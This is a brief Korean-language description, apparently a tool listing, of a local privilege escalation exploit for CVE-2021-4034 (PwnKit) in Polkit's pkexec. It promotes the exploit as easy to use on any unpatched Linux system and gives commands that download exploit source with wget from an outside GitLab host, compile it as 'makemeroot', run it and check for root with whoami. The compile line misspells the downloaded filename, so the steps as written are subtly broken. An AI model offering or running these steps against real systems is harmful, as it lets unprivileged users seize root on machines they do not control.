
CVE-2021-4034(PWNKIT)에 대한 로컬 권한 상승 익스플로잇으로, Polkit의 pkexec를 대상으로 하여 권한이 없는 사용자가 취약한 Linux 시스템에서 루트 권한을 획득할 수 있게 합니다.
CVE-2021-4034 (PWNKIT)
Polkit의 pkexec에서 발생하는 메모리 손상 취약점으로, 기본 polkit 구성을 사용하는 취약한 시스템에서 권한이 없는 모든 사용자가 전체 루트 권한을 획득할 수 있습니다.
사용하기 쉬운 로컬 권한 상승 도구로, 패치되지 않은 모든 Linux 시스템에서 동작합니다.
wget https://gitlab.com/nelox/pwnkit-vulnerability/blasty-vs-pkexec.c
gcc bblasty-vs-pkexec.c -o makemeroot
./makemeroot
whoami